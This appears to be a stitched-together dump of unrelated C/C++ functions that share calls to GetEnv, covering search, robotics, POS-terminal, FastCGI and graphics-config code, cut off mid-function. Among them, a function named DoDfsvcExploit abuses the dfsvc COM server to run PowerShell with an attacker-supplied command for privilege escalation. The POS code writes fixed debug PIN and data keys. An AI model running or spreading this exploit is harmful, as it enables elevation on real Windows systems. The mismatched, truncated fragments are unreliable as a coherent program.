void query (void) { ProgTime TotalStartTime, TotalInvfTime, TotalTextTime; InitQueryTimes iqt; query_data *qd; TotalStartTime.RealTime = TotalStartTime.CPUTime = 0; TotalInvfTime.RealTime = TotalInvfTime.CPUTime = 0; TotalTextTime.RealTime = TotalTextTime.CPUTime = 0; qd = InitQuerySystem (GetDefEnv ("mgdir", "./"), GetDefEnv ("mgname", ""), &iqt); if (!qd) FatalError (1, mg_errorstrs[mg_errno], mg_error_data); start_up_stats (qd, iqt); while (1) { ProgTime StartTime, InvfTime, TextTime; char QueryType; char OutputType; char *line; ResetFileStats (qd); qd->max_mem_in_use = qd->mem_in_use = 0; qd->tot_hops_taken += qd->hops_taken; qd->tot_num_of_ptrs += qd->num_of_ptrs; qd->tot_num_of_accum += qd->num_of_accum; qd->tot_num_of_terms += qd->num_of_terms; qd->tot_num_of_ans += qd->num_of_ans; qd->tot_text_idx_lookups += qd->text_idx_lookups; qd->hops_taken = qd->num_of_ptrs = 0; qd->num_of_accum = qd->num_of_ans = qd->num_of_terms = 0; qd->text_idx_lookups = 0; Display_Stats (stderr); Clear_Stats (); line = get_query (qd); if (!line || Quitting) break; GetPostProc (line); GetTime (&StartTime); FreeQueryDocs (qd); QueryType = get_query_type (); OutputType = get_output_type (); /* No point in hiliting words on a docnum query */ if (OutputType == OUTPUT_HILITE && QueryType == QUERY_DOCNUMS) OutputType = OUTPUT_TEXT; switch (QueryType) { case QUERY_BOOLEAN: { char *maxdocs; BooleanQueryInfo bqi; maxdocs = GetDefEnv ("maxdocs", "all"); bqi.MaxDocsToRetrieve = strcmp (maxdocs, "all") ? atoi (maxdocs) : -1; BooleanQuery (qd, line, &bqi); break; } case QUERY_APPROX: case QUERY_RANKED: { char *maxdocs; char *maxterms; char *maxaccum; RankedQueryInfo rqi; maxdocs = GetDefEnv ("maxdocs", "all"); maxterms = GetDefEnv ("max_terms", "all"); maxaccum = GetDefEnv ("max_accumulators", "all"); rqi.Sort = BooleanEnv (GetEnv ("sorted_terms"), 0); rqi.QueryFreqs = BooleanEnv (GetEnv ("qfreq"), 1); rqi.Exact = QueryType == QUERY_RANKED; rqi.MaxDocsToRetrieve = strcmp (maxdocs, "all") ? atoi (maxdocs) : -1; rqi.MaxTerms = strcmp (maxterms, "all") ? atoi (maxterms) : -1; rqi.MaxParasToRetrieve = rqi.MaxDocsToRetrieve; if (qd->id->ifh.InvfLevel == 3 && GetEnv ("maxparas")) rqi.MaxParasToRetrieve = atoi (GetEnv ("maxparas")); rqi.AccumMethod = toupper (*GetDefEnv ("accumulator_method", "A")); rqi.MaxAccums = strcmp (maxaccum, "all") ? atoi (maxaccum) : -1; rqi.HashTblSize = IntEnv (GetEnv ("hash_tbl_size"), 1000); rqi.StopAtMaxAccum = BooleanEnv (GetEnv ("stop_at_max_accum"), 0); rqi.skip_dump = GetEnv ("skip_dump"); RankedQuery (qd, line, &rqi); break; } case QUERY_DOCNUMS: { DocnumsQuery (qd, line); break; } } GetTime (&InvfTime); if (qd->DL) MoreDocs (qd, line, OutputType); GetTime (&TextTime); if (BooleanEnv (GetEnv ("timestats"), 0) || BooleanEnv (GetEnv ("briefstats"), 0)) QueryTimeStats (&StartTime, &InvfTime, &TextTime); if (BooleanEnv (GetEnv ("diskstats"), 0) || BooleanEnv (GetEnv ("briefstats"), 0)) File_Stats (qd); if (BooleanEnv (GetEnv ("memstats"), 0) || BooleanEnv (GetEnv ("briefstats"), 0)) MemStats (qd); if (BooleanEnv (GetEnv ("sizestats"), 0)) SizeStats (qd); TotalInvfTime.RealTime += InvfTime.RealTime - StartTime.RealTime; TotalInvfTime.CPUTime += InvfTime.CPUTime - StartTime.CPUTime; TotalTextTime.RealTime += TextTime.RealTime - StartTime.RealTime; TotalTextTime.CPUTime += TextTime.CPUTime - StartTime.CPUTime; } if (isatty (fileno (InFile)) && !Quitting) fprintf (stderr, "\n"); shut_down_stats (qd, &TotalStartTime, &TotalInvfTime, &TotalTextTime); Display_Stats (stderr); }
String GetHomeDirectory() { return GetEnv("HOMEDRIVE") + GetEnv("HOMEPATH"); }
void DoDfsvcExploit() { CLSID clsid; CLSIDFromString(CLSID_DFSVC, &clsid); DebugPrintf("Starting DFSVC Exploit\n"); mscorlib::_ObjectPtr obj; HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); if (FAILED(hr)) { WCHAR cmdline[] = L"dfsvc.exe"; STARTUPINFO startInfo = { 0 }; PROCESS_INFORMATION procInfo = { 0 }; // Start dfsvc (because we can due to the ElevationPolicy) if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo)) { CloseHandle(procInfo.hProcess); CloseHandle(procInfo.hThread); // Just sleep to ensure it comes up Sleep(4000); hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); } else { DebugPrintf("Couldn't create service %d\n", GetLastError()); } } if (SUCCEEDED(hr)) { try { mscorlib::_TypePtr type = obj->GetType(); // Get type of Type (note defaults to RuntimeType then TypeInfo) type = type->GetType()->BaseType->BaseType; DebugPrintf("TypeName: %ls", type->FullName.GetBSTR()); mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1); DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod); std::vector<variant_t> getTypeArgs; getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"); // Get process type type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs); if (type) { mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2); if (startMethod) { std::vector<variant_t> startArgs; startArgs.push_back(L"powershell"); startArgs.push_back(GetEnv(L"PSHCMD")); ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); } else { DebugPrintf("Couldn't find Start method"); } } else { DebugPrintf("Couldn't find Process Type"); } } catch (_com_error e) { DebugPrintf("COM Error: %ls\n", e.ErrorMessage()); } } else { DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr); } }
AwtDesktopProperties::~AwtDesktopProperties() { GetEnv()->DeleteGlobalRef(self); }
Profiler() : ProfilerBase( COR_PRF_MONITOR_ENTERLEAVE, GetEnv( txtProfileEnv ) ), writer( GetEnv( binProfileEnv ) ) { __inst = this; }
void *__hxcpp_get_proc_address(String inLib, String full_name,bool inNdllProc) { #ifdef ANDROID inLib = HX_CSTRING("lib") + inLib; //__android_log_print(ANDROID_LOG_INFO, "loader", "%s: %s", inLib.__CStr(), inPrim.__CStr() ); #endif #ifdef IPHONE gLoadDebug = true; setenv("DYLD_PRINT_APIS","1",true); #elif !defined(HX_WINRT) gLoadDebug = gLoadDebug || getenv("HXCPP_LOAD_DEBUG"); #endif String ext = #if defined(_WIN32) HX_CSTRING(".dll"); #elif defined(IPHONEOS) HX_CSTRING(".ios.dylib"); #elif defined(IPHONESIM) HX_CSTRING(".sim.dylib"); #elif defined(__APPLE__) HX_CSTRING(".dylib"); #elif defined(ANDROID) || defined(GPH) || defined(WEBOS) || defined(BLACKBERRY) || defined(EMSCRIPTEN) || defined(TIZEN) HX_CSTRING(".so"); #else HX_CSTRING(".dso"); #endif String bin = #ifdef _WIN32 HX_CSTRING("Windows"); // Unix... #elif defined(__APPLE__) #ifdef HXCPP_M64 HX_CSTRING("Mac64"); #else HX_CSTRING("Mac"); #endif #elif defined (ANDROID) HX_CSTRING("Android"); #elif defined(WEBOS) HX_CSTRING("webOS"); #elif defined(BLACKBERRY) HX_CSTRING("BlackBerry"); #elif defined(RASPBERRYPI) HX_CSTRING("RPi"); #elif defined(EMSCRIPTEN) HX_CSTRING("Emscripten"); #elif defined(TIZEN) HX_CSTRING("Tizen"); #elif defined(IPHONESIM) HX_CSTRING("IPhoneSim"); #elif defined(IPHONEOS) HX_CSTRING("IPhoneOs"); #else #ifdef HXCPP_M64 HX_CSTRING("Linux64"); #else HX_CSTRING("Linux"); #endif #endif int passes = 4; #ifdef ANDROID std::string module_name = inLib.__CStr(); Module module = sgLoadedModule[module_name]; #else Module module = sgLoadedModule[inLib.__s]; #endif bool new_module = module==0; if (!module && sgRegisteredPrims) { void *registered = (*sgRegisteredPrims)[full_name.__CStr()]; if (registered) return registered; } if (!module && gLoadDebug) { #ifdef ANDROID __android_log_print(ANDROID_LOG_INFO, "loader", "Searching for %s...", module_name.c_str()); #else printf("Searching for %s...\n", inLib.__CStr()); #endif } for(int pass=0;module==0 && pass<2;pass++) { String dll_ext = HX_CSTRING("./") + inLib + ( (pass&1) ? HX_CSTRING(".ndll") : ext ); // Try Current directory first ... if (gLoadDebug) { #ifndef ANDROID printf(" try %s...\n", dll_ext.__CStr()); #else __android_log_print(ANDROID_LOG_INFO, "loader", "Try %s", dll_ext.__CStr()); #endif } module = hxLoadLibrary(dll_ext); if (module) break; dll_ext = inLib + ( (pass&1) ? HX_CSTRING(".ndll") : ext ); if (gLoadDebug) { #ifndef ANDROID printf(" try %s...\n", dll_ext.__CStr()); #else __android_log_print(ANDROID_LOG_INFO, "loader", "Try %s", dll_ext.__CStr()); #endif } module = hxLoadLibrary(dll_ext); // Try exactly as specified... if (!module) { String dll_ext = pass==0 ? inLib : HX_CSTRING("./") + inLib; if (gLoadDebug) { #ifndef ANDROID printf(" try %s...\n", dll_ext.__CStr()); #else __android_log_print(ANDROID_LOG_INFO, "loader", "Try %s", dll_ext.__CStr()); #endif } module = hxLoadLibrary(dll_ext); } #ifdef HX_MACOS if (!module) { String exe_path = HX_CSTRING("@executable_path/") + inLib + ( (pass&1) ? HX_CSTRING(".ndll") : ext ); if (gLoadDebug) { printf(" try %s...\n", exe_path.__CStr()); } module = hxLoadLibrary(exe_path); } #endif #if !defined(ANDROID) && !defined(HX_WINRT) && !defined(IPHONE) && !defined(EMSCRIPTEN) if (!module) { String hxcpp = GetEnv("HXCPP"); if (hxcpp.length!=0) { String name = hxcpp + HX_CSTRING("/bin/") + bin + HX_CSTRING("/") + dll_ext; if (gLoadDebug) printf(" try %s...\n", name.__CStr()); module = hxLoadLibrary(name); } } if (!module) { String hxcpp = FindHaxelib( HX_CSTRING("hxcpp") ); if (hxcpp.length!=0) { String name = hxcpp + HX_CSTRING("/bin/") + bin + HX_CSTRING("/") + dll_ext; if (gLoadDebug) printf(" try %s...\n", name.__CStr()); module = hxLoadLibrary(name); } } if (!module) { String path = FindHaxelib(inLib); if (path.length!=0) { String full_path = path + HX_CSTRING("/ndll/") + bin + HX_CSTRING("/") + dll_ext; if (gLoadDebug) printf(" try %s...\n", full_path.__CStr()); module = hxLoadLibrary(full_path); } } #endif } if (!module) { throw Dynamic(HX_CSTRING("Could not load module ") + inLib + HX_CSTRING("@") + full_name); } if (new_module) { #ifdef ANDROID sgLoadedModule[module_name] = module; #else sgLoadedModule[inLib.__s] = module; #endif SetLoaderProcFunc set_loader = (SetLoaderProcFunc)hxFindSymbol(module,"hx_set_loader"); if (set_loader) set_loader(hx_cffi); GetNekoEntryFunc func = (GetNekoEntryFunc)hxFindSymbol(module,"__neko_entry_point"); if (func) { NekoEntryFunc entry = (NekoEntryFunc)func(); if (entry) entry(); } } FundFunc proc_query = (FundFunc)hxFindSymbol(module,full_name.__CStr()); if (!proc_query) { #ifdef ANDROID __android_log_print(ANDROID_LOG_ERROR, "loader", "Could not find primitive %s in %p", full_name.__CStr(), module); #else fprintf(stderr,"Could not find primitive %s.\n", full_name.__CStr()); #endif return 0; } if (!inNdllProc) return (void *)proc_query; void *proc = proc_query(); if (!proc) { #ifdef ANDROID __android_log_print(ANDROID_LOG_ERROR, "loader", "Could not identify primitive %s in %s\n", full_name.__CStr(),inLib.__CStr()); fprintf(stderr,"Could not identify primitive %s in %s\n", full_name.__CStr(),inLib.__CStr()); #elif defined(ANDROID) __android_log_print(ANDROID_LOG_ERROR, "loader", "Could not identify primitive %s in %s", inPrim.__CStr(), inLib.__CStr() ); #else fprintf(stderr,"Could not identify primitive %s in %s\n", full_name.__CStr(),inLib.__CStr()); #endif } return proc; }
bool GeneralIK::_SolveTransThenRot(std::vector<dReal>& q_s) { if(bPRINT) RAVELOG_INFO("Solving...\n"); //clear from previous run _numitr = 0; badjointinds.resize(0); prev_error = 1000000.0; //initialize stepsize and epsilon maxstep = 0.1*_targtms.size(); stepsize = maxstep; epsilon = 0.001; bClearBadJoints = true; //setting this to true will make the algorithm attempt to move joints that are at joint limits at every iteration if(bDRAW) { for(int i = 0; i < _targmanips.size();i++) { GetEnv()->plot3( &(DoubleVectorToFloatVector(_targtms[i].trans)[0]), 1, 0, 5, Vector(0,1,0) ); } } bBalanceGradient = false; Vector perpvec; //while(1) for(int kk = 0; kk < 3000; kk++) { _numitr++; bLimit = false; _pRobot->SetActiveDOFValues(q_s); if(bWRITETRAJ) { for(int i = 0; i < _pRobot->GetActiveDOF(); i++) { _trajpoint.q[i] = q_s[i]; } ptraj->AddPoint(_trajpoint); } for(int i = 0; i < _targmanips.size();i++) { _pRobot->SetActiveManipulator(_targmanips[i]); _curtms[i] = _pRobot->GetActiveManipulator()->GetEndEffectorTransform(); //since doing only translation, trick the solver into thinking it has achieved correct rotation _curtms[i].rot = _targtms[i].rot; if(bDRAW) GetEnv()->plot3( &(DoubleVectorToFloatVector(_curtms[i].trans)[0]), 1, 0, 5, Vector(1,0,0) ); } x_error = TransformDifferenceVectorized(dx.Store(),_targtms,_curtms); if(bPRINT) PrintMatrix(dx.Store(),1,dx.Nrows(),"dx: "); if(bPRINT) RAVELOG_INFO("x error: %f\n",x_error); //if balance stuff is on, error will go up sometimes, so don't do this check if(!bBalance && (x_error >= prev_error || (prev_error - x_error < epsilon/10))&& x_error > epsilon) { if(bPRINT) { RAVELOG_INFO("no progress\n"); RAVELOG_INFO("prev: %f x_err: %f limit %d\n",prev_error,x_error,(int)bLimit); } stepsize = stepsize/2; x_error = prev_error; q_s = q_s_old; } else stepsize = maxstep; if(bPRINT) RAVELOG_INFO("stepsize: %f\n",stepsize); //don't let step size get too small if(stepsize < epsilon) { //RAVELOG_INFO("Projection stalled _numitr: %d\n",_numitr); return false; } if(bClearBadJoints) { badjointinds.resize(0); } do{ q_s_old = q_s; if(bLimit == false) prev_error = x_error; if(bBalance) { GetCOGJacobian(Transform(),Jtemp2,curcog); } if(x_error < epsilon && (!bBalance || CheckSupport(curcog))) { if(bPRINT) RAVELOG_INFO("Translation component projection successfull _numitr: %d\n",_numitr); return _SolveStopAtLimits(q_s); } //only need to compute the jacobian once if there are joint limit problems if(bLimit == false) { for(int i = 0; i < _targmanips.size();i++) { _pRobot->SetActiveManipulator(_targmanips[i]); GetFullJacobian(_curtms[i],_targtms[i],Jtemp); Jtrans.Rows(i*3 +1,(i+1)*3) = Jtemp.Rows(1,3); dx_trans.Rows(i*3 +1,(i+1)*3) = dx.Rows(1,3); } if(bBalance) { //the cog jacobian should only be 2 dimensional, b/c we don't care about z GetCOGJacobian(Transform(),Jtemp2,curcog); if(!CheckSupport(curcog)) { bBalanceGradient = true; balancedx[0] = (curcog.x - cogtarg.x); balancedx[1] = (curcog.y - cogtarg.y); } else { balancedx[0] = 0; balancedx[1] = 0; bBalanceGradient = false; } } } //eliminate bad joint columns from the Jacobian for(int j = 0; j < badjointinds.size(); j++) for(int k = 0; k < _numtransdims; k++) Jtrans[k][badjointinds[j]] = 0; if(bBalance) { for(int j = 0; j < badjointinds.size(); j++) for(int k = 0; k <2; k++) Jtemp2[k][badjointinds[j]] = 0; } if(x_error > stepsize) magnitude = stepsize/x_error; else magnitude = 1; //NEWMAT::DiagonalMatrix Weights; //Weights.ReSize(_numdofs); //Weights = 1; //J = J * Weights; //PrintMatrix(J.Store(),_numtargdims,_numdofs,"J: "); NEWMAT::DiagonalMatrix Reg(_numtransdims); Reg = 0.0001; M << (Jtrans*Jtrans.t()) + Reg; //PrintMatrix(J.Store(),_numtargdims,_numtargdims,"M: "); invConditioningBound(100,M,Minv); //Minv = M.i(); //PrintMatrix(Minv.Store(),_numtargdims,_numtargdims,"Minv: "); Jplus = Jtrans.t()*Minv; if(bBalanceGradient) { Mbal << (Jtemp2*Jtemp2.t()); invConditioningBound(100,Mbal,Mbalinv); //do ik, then move toward balance in null space step = magnitude*Jplus*(dx_trans) + (NEWMAT::IdentityMatrix(_numdofs) - Jplus*Jtrans)*(Jtemp2.t()*Mbalinv)*(1*balancedx); } else { step = magnitude*Jplus*(dx_trans); } if(bPRINT) PrintMatrix(step.Store(),1,step.Nrows(),"step: "); //add step and check for joint limits bLimit = false; for(int i = 0; i < _numdofs; i++) { q_s[i] = q_s_old[i] - step[i]; if(q_s[i] < _lowerLimit[i] || q_s[i] > _upperLimit[i]) { if(bPRINT) RAVELOG_INFO("Jacobian going past joint limit. J%d: %f outside %f to %f\n",i,q_s[i],_lowerLimit[i],_upperLimit[i]); if(q_s[i] < _lowerLimit[i]) q_s[i] = _lowerLimit[i]; if(q_s[i] > _upperLimit[i]) q_s[i] = _upperLimit[i]; badjointinds.push_back(i); //note this will never add the same joint twice, even if bClearBadJoints = false bLimit = true; } } //move back to previous point if any joint limits if(bLimit) { q_s = q_s_old; } }while(bLimit); if(bPRINT) RAVELOG_INFO("after limits\n"); } RAVELOG_INFO("Iteration limit reached\n"); return false; }
int main(void) { uchar bUpdateUI, bGallery = FALSE; int iRet; ST_EVENT_MSG stEventMsg; int iGallery_Image_Num = 0; uchar szGallery_Image_Num[5]= {0}; #ifdef APP_DEBUG ST_KEY_INFO stTmp_Key; ST_KCV_INFO stTmp_Kcv; #endif OsLogSetTag(APP_NAME); OsRegGetValue("ro.fac.mach", gl_szTerminalType); // Application initialization memset(&stEventMsg, 0, sizeof(stEventMsg)); stEventMsg.MsgType = USER_MSG; iRet = event_main(&stEventMsg); if (iRet == ERR_EXIT_APP) { // CommOnHook(TRUE); return 0; } ////////////////////////////////////////////////////////////////////////// //temp #ifdef APP_DEBUG OsPedEraseKeys(); stTmp_Key.ucSrcKeyType = PED_TMK; stTmp_Key.ucSrcKeyIdx = 0; stTmp_Key.ucDstKeyType = PED_TMK; stTmp_Key.ucDstKeyIdx = MASTER_KEY_ID; memcpy(stTmp_Key.aucDstKeyValue, "\xAB\xCD\xEF\x01\x23\x45\x67\x89"\ "\xAB\xCD\xEF\x01\x23\x45\x67\x89", 16); stTmp_Key.iDstKeyLen = 16; stTmp_Kcv.iCheckMode =0; PedWriteKey(&stTmp_Key, &stTmp_Kcv); stTmp_Key.ucSrcKeyType = PED_TMK; stTmp_Key.ucSrcKeyIdx = MASTER_KEY_ID; stTmp_Key.ucDstKeyType = PED_TPK; stTmp_Key.ucDstKeyIdx = DEF_PIN_KEY_ID; memcpy(stTmp_Key.aucDstKeyValue, "\xAB\xCD\xEF\x01\x23\x45\x67\x89"\ "\xAB\xCD\xEF\x01\x23\x45\x67\x89", 16); stTmp_Key.iDstKeyLen = 16; stTmp_Kcv.iCheckMode =0; PedWriteKey(&stTmp_Key, &stTmp_Kcv); stTmp_Key.ucSrcKeyType = PED_TMK; stTmp_Key.ucSrcKeyIdx = MASTER_KEY_ID; stTmp_Key.ucDstKeyType = PED_TDK; stTmp_Key.ucDstKeyIdx = DEF_DATA_KEY_ID; memcpy(stTmp_Key.aucDstKeyValue, "\x12\x12\x12\x12\x12\x12\x12\x12"\ "\x12\x12\x12\x12\x12\x12\x12\x12", 16); stTmp_Key.iDstKeyLen = 16; stTmp_Kcv.iCheckMode =0; PedWriteKey(&stTmp_Key, &stTmp_Kcv); #endif ////////////////////////////////////////////////////////////////////////// // Main loop bUpdateUI = TRUE; if(0 == GetEnv("PIC_NO", szGallery_Image_Num)) { iGallery_Image_Num = atoi(szGallery_Image_Num); } else { iGallery_Image_Num = 0; } //RunApp(1); test while( 1 ) { // Setup idle timer if (bUpdateUI) { SetIdleTimer(); } ShowIdleMainUI(&bUpdateUI, bGallery, iGallery_Image_Num); // bUpdateUI value may change // When magstripe card swiped if( MagSwiped()==0 ) { memset(&stEventMsg, 0, sizeof(ST_EVENT_MSG)); stEventMsg.MsgType = MAGCARD_MSG; stEventMsg.MagMsg.RetCode = MagRead(stEventMsg.MagMsg.track1, stEventMsg.MagMsg.track2, stEventMsg.MagMsg.track3); iRet = event_main(&stEventMsg); if (iRet==ERR_EXIT_APP) { // CommOnHook(TRUE); return 0; } bUpdateUI = TRUE; bGallery = FALSE; CommOnHook(FALSE); continue; } // When chip card inserted if( ChkIfEmvEnable() && IccDetect(ICC_USER)==0 ) { memset(&stEventMsg, 0, sizeof(ST_EVENT_MSG)); stEventMsg.MsgType = ICCARD_MSG; iRet = event_main(&stEventMsg); if (iRet==ERR_EXIT_APP) { // CommOnHook(TRUE); return 0; } bUpdateUI = TRUE; bGallery = FALSE; CommOnHook(FALSE); continue; } // If any key is pressed if( 0==kbhit() ) { memset(&stEventMsg, 0, sizeof(ST_EVENT_MSG)); stEventMsg.MsgType = KEYBOARD_MSG; stEventMsg.KeyValue = getkey(); // Add by lirz v1.02.0000 // If key enter,it repaint the main UI(mainly logo) again and again,do not do this if(KEYENTER == stEventMsg.KeyValue) { //RunApp(1); test continue; } iRet = event_main(&stEventMsg); if (iRet==ERR_EXIT_APP) { SetCurrTitle(_T("Exit")); // CommOnHook(TRUE); if(PasswordBank() == 0) { return 0; } } bUpdateUI = TRUE; bGallery = FALSE; CommOnHook(FALSE); continue; } // bug 803 change the sequence of 2 ChkIdleTimer if (ChkIdleTimer(glSysParam.stEdcInfo.ucIdleMinute * 60 /2)) { bGallery = TRUE; } // One of idle-processing if (ChkIdleTimer(glSysParam.stEdcInfo.ucIdleMinute * 60)) { if(0 == MainIdleProc()) { bUpdateUI = TRUE; bGallery = FALSE; } continue; } // TODO:add your event-handlers here... } // end of while( 1 return 0; }
ShortcutLinearPlanner(EnvironmentBasePtr penv, std::istream& sinput) : PlannerBase(penv) { __description = ":Interface Author: Rosen Diankov\n\npath optimizer using linear shortcuts."; _linearretimer = RaveCreatePlanner(GetEnv(), "LinearTrajectoryRetimer"); }
/// \brief jitters the current configuration and sets a new configuration on the environment /// int Sample(std::vector<dReal>& vnewdof, IntervalType interval=IT_Closed) { RobotBase::RobotStateSaver robotsaver(_probot, KinBody::Save_LinkTransformation|KinBody::Save_ActiveDOF); _InitRobotState(); const dReal linkdistthresh = _linkdistthresh; const dReal linkdistthresh2 = _linkdistthresh2; vector<AABB> newLinkAABBs; bool bCollision = false; bool bConstraintFailed = false; bool bConstraint = !!_neighstatefn; // have to test with perturbations since very small changes in angles can produce collision inconsistencies std::vector<dReal> perturbations; if( _perturbation > 0 ) { perturbations.resize(3,0); perturbations[0] = _perturbation; perturbations[1] = -_perturbation; } else { perturbations.resize(1,0); } vnewdof.resize(GetDOF()); int numNeighStateFailed = 0; FOREACH(itperturbation,perturbations) { if( bConstraint ) { FOREACH(it,_deltadof) { *it = *itperturbation; } vnewdof = _curdof; if( !_neighstatefn(vnewdof,_deltadof,0) ) { _probot->SetActiveDOFValues(_curdof); // if( setret != 0 ) { // // state failed to set, this could mean the initial state is just really bad, so resume jittering // bCollision = true; // break; // } ++numNeighStateFailed; continue; } } else { for(size_t i = 0; i < vnewdof.size(); ++i) { vnewdof[i] = _curdof[i]+*itperturbation; if( vnewdof[i] > _upper.at(i) ) { vnewdof[i] = _upper.at(i); } else if( vnewdof[i] < _lower.at(i) ) { vnewdof[i] = _lower.at(i); } } } // don't need to set state since CheckPathAllConstraints does it _probot->SetActiveDOFValues(vnewdof); if( !!_pConstraintToolDirection && !!_pmanip ) { if( !_pConstraintToolDirection->IsInConstraints(_pmanip->GetTransform()) ) { bConstraintFailed = true; break; } } if( !!_pConstraintToolPosition && !!_pmanip ) { if( !_pConstraintToolPosition->IsInConstraints(_pmanip->GetTransform()) ) { bConstraintFailed = true; break; } } if( GetEnv()->CheckCollision(_probot, _report) || _probot->CheckSelfCollision(_report) ) { bCollision = true; break; } }
std::string GetEnv(const std::string& name) { static const std::string empty; return GetEnv(name, empty); }
int HttpRequestX::ParseUrlQuery(){ if(m_initialized){ return m_param_count; } m_initialized = true; char * content_type = GetContentType(); if(content_type != NULL && strncmp(content_type, "multipart", 10) == 0) { return 0; // todo: support multipart/form-data } char * param_buffer = NULL; if(GetMethod() == HTTP_METHOD_POST) { unsigned long content_len; char * content_len_str = GetEnv("CONTENT_LENGTH"); sscanf(content_len_str,"%ld",&content_len); content_len += 1; if(content_len > MAX_CONTENT_LENGTH) { // TODO 检查content_len是否超出最大 return -2; } param_buffer = (char*) malloc (sizeof(char)*content_len); bzero(param_buffer, sizeof(char)*content_len); int read_num = FCGX_GetStr(param_buffer, content_len, request_.in); if (read_num < 0) { return -1; } } else if(GetMethod() == HTTP_METHOD_GET) { char * query_string = GetEnv("QUERY_STRING"); param_buffer = strdup(query_string); } else { //TODO: 不支持的方法 return -1; } char *query = param_buffer; int len = strlen(param_buffer); int num = 0; // 参数个数 char * q = query; if(q == NULL) { free(param_buffer); return 0; } while(strsep(&q, "&") != NULL){ num ++; } if(num == 0) { free(param_buffer); return 0; } int size = (num)*sizeof(param_pair_t); if(m_params == NULL){ m_params = (param_pair_t*)malloc(size); } else if(m_param_array_size<num){ // 与上次请求的参数个数相比较,如果需要更多内存,则重新分配 m_params = (param_pair_t*)realloc(m_params, size); m_param_array_size = num; } if(m_params == NULL) { free(param_buffer); return -1; } memset(m_params, 0, size); param_pair_t * my_param = m_params; char * name; char * value; for (q = query; q < (query + len);){ name = q; value = q; q += strlen(q)+1; // 跳到下一个参数 name = strsep(&value, "="); // 分解当前参数 my_param->name = url_decode2(strdup(name)); my_param->value = url_decode2(strdup(value==NULL ? "" : value) ); my_param++; } free(param_buffer); return num; }
void Init() { Internal("Config::Init","()"); #ifndef REGAL_NO_GETENV const char *tmp; #if !REGAL_FORCE_ES1_PROFILE tmp = GetEnv( "REGAL_FORCE_ES1_PROFILE" ); if (tmp) forceES1Profile = atoi(tmp)!=0; #endif #if !REGAL_FORCE_ES2_PROFILE tmp = GetEnv( "REGAL_FORCE_ES2_PROFILE" ); if (tmp) forceES2Profile = atoi(tmp)!=0; #endif #if !REGAL_FORCE_CORE_PROFILE tmp = GetEnv( "REGAL_FORCE_CORE_PROFILE" ); if (tmp) forceCoreProfile = atoi(tmp)!=0; #endif // With REGAL_SYS_GLX && REGAL_SYS_EGL // we infer each from other, if specified, // to behave as a toggle. #if REGAL_SYS_GLX tmp = GetEnv( "REGAL_SYS_GLX" ); if (tmp) { sysGLX = atoi(tmp)!=0; #if REGAL_SYS_EGL sysEGL = !sysGLX; #endif } #endif #if REGAL_SYS_EGL tmp = GetEnv( "REGAL_SYS_EGL" ); if (tmp) { sysEGL = atoi(tmp)!=0; #if REGAL_SYS_GLX sysGLX = !sysEGL; #endif } #endif // Default to GLX, if necessary #if REGAL_SYS_GLX && REGAL_SYS_EGL if (sysGLX && sysEGL) sysEGL = false; #endif #if !REGAL_FORCE_EMULATION tmp = GetEnv( "REGAL_FORCE_EMULATION" ); if (tmp) forceEmulation = atoi(tmp)!=0; #endif #if REGAL_EMULATION tmp = GetEnv( "REGAL_EMULATION" ); if (tmp) enableEmulation = atoi(tmp)!=0; #endif // Deprecated tmp = GetEnv( "REGAL_NO_EMULATION" ); if (tmp) enableEmulation = atoi(tmp)==0; #if REGAL_DEBUG tmp = GetEnv( "REGAL_DEBUG" ); if (tmp) enableDebug = atoi(tmp)!=0; #endif #if REGAL_TRACE tmp = GetEnv( "REGAL_TRACE" ); if (tmp) enableTrace = atoi(tmp)!=0; #endif #if REGAL_ERROR tmp = GetEnv( "REGAL_ERROR" ); if (tmp) enableError = atoi(tmp)!=0; #endif #if REGAL_CODE tmp = GetEnv( "REGAL_CODE" ); if (tmp) enableCode = atoi(tmp)!=0; #endif #if REGAL_LOG tmp = GetEnv( "REGAL_LOG" ); if (tmp) enableLog = atoi(tmp)!=0; #endif #if REGAL_DRIVER tmp = GetEnv( "REGAL_DRIVER" ); if (tmp) enableDriver = atoi(tmp)!=0; #endif #if REGAL_EMU_PPA tmp = GetEnv( "REGAL_EMU_PPA" ); if (tmp) enableEmuPpa = atoi(tmp)!=0; #endif #if REGAL_EMU_PPCA tmp = GetEnv( "REGAL_EMU_PPCA" ); if (tmp) enableEmuPpca = atoi(tmp)!=0; #endif #if REGAL_EMU_OBJ tmp = GetEnv( "REGAL_EMU_OBJ" ); if (tmp) enableEmuObj = atoi(tmp)!=0; #endif #if REGAL_EMU_BIN tmp = GetEnv( "REGAL_EMU_BIN" ); if (tmp) enableEmuBin = atoi(tmp)!=0; #endif #if REGAL_EMU_TEXSTO tmp = GetEnv( "REGAL_EMU_TEXSTO" ); if (tmp) enableEmuTexSto = atoi(tmp)!=0; #endif #if REGAL_EMU_XFER tmp = GetEnv( "REGAL_EMU_XFER" ); if (tmp) enableEmuXfer = atoi(tmp)!=0; #endif #if REGAL_EMU_DSA tmp = GetEnv( "REGAL_EMU_DSA" ); if (tmp) enableEmuDsa = atoi(tmp)!=0; #endif #if REGAL_EMU_RECT tmp = GetEnv( "REGAL_EMU_RECT" ); if (tmp) enableEmuRect = atoi(tmp)!=0; #endif #if REGAL_EMU_IFF tmp = GetEnv( "REGAL_EMU_IFF" ); if (tmp) enableEmuIff = atoi(tmp)!=0; #endif #if REGAL_EMU_SO tmp = GetEnv( "REGAL_EMU_SO" ); if (tmp) enableEmuSo = atoi(tmp)!=0; #endif #if REGAL_EMU_VAO tmp = GetEnv( "REGAL_EMU_VAO" ); if (tmp) enableEmuVao = atoi(tmp)!=0; #endif #if REGAL_EMU_TEXC tmp = GetEnv( "REGAL_EMU_TEXC" ); if (tmp) 